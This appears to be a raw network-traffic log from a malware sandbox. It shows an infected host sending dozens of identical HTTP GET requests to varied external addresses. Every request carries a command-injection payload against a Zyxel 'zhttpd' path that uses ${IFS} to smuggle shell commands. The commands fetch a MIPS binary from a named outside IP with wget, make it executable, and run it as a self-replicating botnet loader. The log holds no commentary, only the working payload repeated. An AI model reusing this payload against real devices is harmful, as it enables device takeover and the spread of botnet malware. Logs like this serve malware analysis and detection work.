                                                Jan 12, 2024 18:16:42.914112091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9281192.168.2.2353616160.107.102.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914125919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9282192.168.2.23526424.49.4.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914160967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9283192.168.2.2342296203.116.83.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914217949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9284192.168.2.2339804131.191.203.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914248943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9285192.168.2.2345540202.15.49.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914268017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9286192.168.2.2356866199.110.154.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914310932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9287192.168.2.234331412.60.239.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914346933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9288192.168.2.235584831.68.29.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914386034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9289192.168.2.2341844102.228.147.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914424896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9290192.168.2.2340190176.12.254.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914458990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9291192.168.2.2343094101.168.246.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914519072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9292192.168.2.233645064.122.64.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914555073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9293192.168.2.234215897.160.222.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914607048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9294192.168.2.235486276.148.195.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914638042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9295192.168.2.2341568167.172.37.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914674997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9296192.168.2.2337306200.248.154.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914707899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9297192.168.2.233739259.90.22.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914752960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9298192.168.2.2357850171.179.203.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914788008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9299192.168.2.2344694210.17.29.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914825916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9300192.168.2.2334430175.214.52.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914856911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9301192.168.2.234234679.181.20.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914879084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9302192.168.2.2358330153.196.104.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914959908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9303192.168.2.235033891.48.14.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.914979935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9304192.168.2.2360708199.99.204.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915015936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9305192.168.2.234004081.75.190.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915049076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9306192.168.2.2349130171.204.190.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915085077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9307192.168.2.2353730131.160.107.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915128946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9308192.168.2.236089627.228.139.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915155888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9309192.168.2.2359300160.153.61.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915190935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9310192.168.2.233440035.159.252.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915235996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9311192.168.2.235998487.68.122.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915245056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9312192.168.2.2337724217.58.192.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915287018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9313192.168.2.23344425.189.13.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915309906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9314192.168.2.2357558221.65.211.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915363073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9315192.168.2.234090219.14.65.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915421963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9316192.168.2.2349778159.162.155.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915446043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9317192.168.2.235950898.145.47.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915481091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9318192.168.2.236020681.80.103.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915523052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9319192.168.2.2333276223.125.159.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915553093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9320192.168.2.2344042219.119.138.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915596962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9321192.168.2.2355670164.145.127.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915644884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9322192.168.2.2332906136.90.100.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915657997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9323192.168.2.2334648123.96.26.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915687084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9324192.168.2.235460844.78.46.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915745974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9325192.168.2.2357470194.29.162.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915760994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9326192.168.2.2335364115.162.82.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915870905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9327192.168.2.2353982169.82.62.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915904999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9328192.168.2.2345752167.223.51.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915939093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9329192.168.2.2349476169.146.104.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.915993929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9330192.168.2.234077084.172.108.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916060925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9331192.168.2.234532683.228.221.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916060925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9332192.168.2.2342782139.139.106.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916100979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9333192.168.2.236092659.146.148.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916101933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9334192.168.2.2348654108.143.62.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916189909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9335192.168.2.236084480.9.202.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916232109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9336192.168.2.2352048150.28.193.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916265965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9337192.168.2.233998648.88.80.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916316986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9338192.168.2.2344768205.129.90.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916344881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9339192.168.2.235509692.78.237.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916379929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9340192.168.2.2350978146.225.226.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916424036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9341192.168.2.235537082.52.230.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916444063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9342192.168.2.2353908120.25.157.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916486025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9343192.168.2.2342904101.65.112.56443
                                                TimestampBytes transferredDirectionData
